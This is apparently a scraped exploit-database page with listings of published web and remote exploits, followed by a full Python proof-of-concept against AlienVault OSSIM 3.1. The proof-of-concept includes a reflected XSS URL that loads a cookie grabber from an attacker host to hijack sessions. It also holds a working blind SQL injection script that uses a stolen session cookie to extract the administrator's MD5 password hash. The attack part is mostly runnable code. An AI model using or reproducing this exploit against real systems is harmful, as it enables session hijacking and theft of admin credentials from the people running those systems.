Menu

Improved exploit search engine. Try it out

"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection"

Author

muts

Platform

php

Release date

2012-07-23

Release Date Title Type Platform Author
2019-07-15 "FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion" webapps php "Mohammed Althibyani"
2019-07-12 "MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting" webapps php "Metin Yunus Kandemir"
2019-07-08 "WordPress Plugin Like Button 1.6.0 - Authentication Bypass" webapps php "Benjamin Lim"
2019-07-08 "Karenderia Multiple Restaurant System 5.3 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-05 "Karenderia Multiple Restaurant System 5.3 - Local File Inclusion" webapps php "Mehmet EMIROGLU"
2019-07-02 "Centreon 19.04 - Remote Code Execution" webapps php Askar
2019-07-01 "ZoneMinder 1.32.3 - Cross-Site Scripting" webapps php "Joey Lane"
2019-07-01 "CiuisCRM 1.6 - 'eventType' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-01 "WorkSuite PRM 2.4 - 'password' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-06-28 "LibreNMS 1.46 - 'addhost' Remote Code Execution" webapps php Askar
2019-06-25 "WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting" webapps php m0ze
2019-06-25 "WordPress Plugin iLive 1.0.4 - Cross-Site Scripting" webapps php m0ze
2019-06-25 "AZADMIN CMS 1.0 - SQL Injection" webapps php "felipe andrian"
2019-06-24 "SeedDMS versions < 5.1.11 - Remote Command Execution" webapps php "Nimit Jain"
2019-06-24 "SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting" webapps php "Nimit Jain"
2019-06-24 "SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting" webapps php "Nimit Jain"
2019-06-24 "dotProject 2.1.9 - SQL Injection" webapps php "Metin Yunus Kandemir"
2019-06-20 "WebERP 4.15 - SQL injection" webapps php "Semen Alexandrovich Lyhin"
2019-06-17 "AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)" remote php AkkuS
2019-06-12 "FusionPBX 4.4.3 - Remote Command Execution" webapps php "Dustin Cobb"
2019-06-11 "phpMyAdmin 4.8 - Cross-Site Request Forgery" webapps php Riemann
2019-06-11 "WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution" webapps php xulchibalraa
2019-06-10 "UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting" webapps php Unk9vvN
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-06-03 "KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities" webapps php SlidingWindow
2019-05-29 "pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Chi Tran"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts
2007-06-03 "IBM Tivoli Provisioning Manager - Remote Overflow (Egghunter)" remote windows muts
2007-03-31 "IBM Lotus Domino Server 6.5 - Remote Overflow" remote windows muts
2007-03-21 "Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)" remote windows muts
2006-10-01 "McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)" remote windows muts
2006-08-26 "Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow" remote windows muts
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/20062/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/20062/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/20062/26681/alienvault-open-source-siem-ossim-31-reflected-cross-site-scripting-blind-sql-injection/download/", "exploit_id": "20062", "exploit_description": "\"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection\"", "exploit_date": "2012-07-23", "exploit_author": "muts", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/usr/bin/python

'''
AlienVault has a reflected XSS vulnerability in the "url" parameter of "top.php". 

Proof of Concept:

Enticing a logged in user to visit the following URL where an attacker is hosting an cookie grabber will allow for the hijacking of the user session:

https://victim/ossim/top.php?option=3&soption=3&url=<script src=http://attacker/grabber.js></script>

With a cookie captured and a session hijacked, the blind SQL injection vulnerability in the "tcp_port" parameter of "base_qry_main.php" can be exploited to extract the admin hash.

Timeline:

# 28 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 23 Jul 2012: Update from CERT: No response from AlienVault
# 23 Jul 2012: Public Disclosure

Special Thanks to Tal Zeltzer

When we access the vulnerable script at:

https://victim/ossim/forensics/base_qry_main.php

With an invalid sql statement in tcp_port[0][0] we see that there is an sql injection vulnerability
[Todo]: Add here description on how we got the original query
We concluded that since magic_quotes_gpc is enabled it will be difficult to obtain a shell quickly.
We decided to take a different approach, we will modify the query in a way that it will only return rows
If a specific field we are interested in has X as the Nth byte.
To optimize the speed we used an algorithm called 'binary search'
what we do is: (n being the Nth byte of the result string):
    - check if X equals n
    - If its not check if X is bigger than n
    - If its not, X is smaller than n

We used this algorithm to extract data from files using the LOAD_FILE function
We also used this algorithm to extract the admin MD5 hashed password
'''
import sys,urllib2,urllib

# Example 
# https://victim/ossim/forensics/base_qry_main.php?tcp_port[0][0]=1=1) and 2 = mid((select pass from ossim.users where login=0x61646d696e),1,1)--&tcp_port[0][1]=layer4_dport&tcp_port[0][2]==&tcp_port[0][3]=17500&tcp_port[0][4]= &tcp_port[0][5]= &tcp_flags[0]= &layer4=TCP&num_result_rows=-1&current_view=-1&submit=QUERYDBP&sort_order=sig_a&clear_allcriteria=1&clear_criteria=time

target = 'https://victim/ossim/forensics/base_qry_main.php'
cookie = 'PHPSESSID=072af2ba52959b1602cc8fa864081d01'
debug = False

#
# We use this function to output debug information if required
#
def debugOut(str, newLine = True):
    if debug == True:
        if newLine == True:
            print str
        else:
            print str,

#
# Injects the given sql-query and check if the results were 'True' or 'False'
#
def sendSql(query):
    global target, cookie           # We use the cookie and the target variables as globals
    debugOut("Query: %s" % query)   # Print the query we execute for debugging
    
    values = { 'tcp_port[0][0]': query,             # This is our injection parameter
               'tcp_port[0][1]': 'layer4_dport',
               'tcp_port[0][2]': '=',
               'tcp_port[0][3]': 17500,
               'tcp_port[0][4]': ' ',
               'tcp_port[0][5]': ' ',
               'tcp_flags[0]': ' ',
               'layer4': 'TCP',
               'num_result_rows': -1,
               'current_view': -1,
               'submit': 'QUERYDBP',
               'sort_order': 'sig_a',
               'clear_allcriteria': 1,
               'clear_criteria': 'time' }

    url = "%s?%s" % (target, urllib.urlencode(values))  # Create the request url
    req = urllib2.Request(url)                          # Create a request for the specified url
    req.add_header('Cookie', cookie)                    # Add the cookie we stolen using XSS to identify ourselves
    try:                                                # Exception handling
        response = urllib2.urlopen(req)                 # Send the request and save the response object
    except:                                             # In-case of an exception
        print 'Failed to SQL inject'                    # Notify the user that there was an error
        sys.exit(-1)                                    # Stop execution of our exploit
    data = response.read()                  # Read the response data
                                            # If the string 'No events...' is in not in our data the query is 'True'
    return('No events matching your search criteria have been found' not in data)

#
# This function enumerates the value of a single nibble out of the admin hash
# It uses the "binary search" algorithm to narrow down the number of requests we send
#
def enumerateNibble(subQuery, location, iMin = 0x00, iMax = 0x0F):
    n = (iMin + iMax) / 2               # Get the middle of our range 
    debugOut('Trying %d' % n, False)    # Notify what value is we comparing the nibble to
                                # Test if the current value equals the nibble     
    if sendSql('1=1) and %s = cast(conv(mid(%s,%d,1), 16, 10) as unsigned integer)--' % (n, subQuery, location)) == True:
        debugOut('Equals!')             # If it is, notify 
        return(hex(n)[2:])              # Return the hex representation of the nibble's value
                                # Test if the current value is bigger than the nibble                                    
    elif sendSql('1=1) and %s > cast(conv(mid(%s,%d,1),16,10) as unsigned integer)--' % (n, subQuery, location)) == True:
        debugOut('Bigger than')                                     # If it is, notify
        return(enumerateNibble(subQuery, location, iMin, n - 1))    # Use recursion to try again with the new reduced range
    else:                       # If the current value is smaller than the nibble
        debugOut('Smaller than')                                    # If it is, notify
        return(enumerateNibble(subQuery, location, n + 1, iMax))    # Use recursion to try again with the new reduced range

#
# Do the actual enumeration of the admin-hash
#
def enumerateAdminHash():
    hash = ''               # Initialize the 'hash' variable
    for i in range(1,33):   # Iterate from 1 to 32 (the size of the md5 hash)
                            # Append the nibble we enumerate from the given query
                            # (This query retrives the administrator hash (obviously..)
        hash += str(enumerateNibble('(select pass from ossim.users where login=0x61646d696e)', i))
        print 'At %d, So far: %s' % (i, hash)   # Notify about our progress
    return(hash)            # When done, return the hash we enumerated


print "Trying to dump the administrator's hash"
print "Note: If we get stuck or get invalid results it's probably due to an invalid session"
hash = enumerateAdminHash()
print "Administrator MD5 hash:"
print "admin:%s" % hash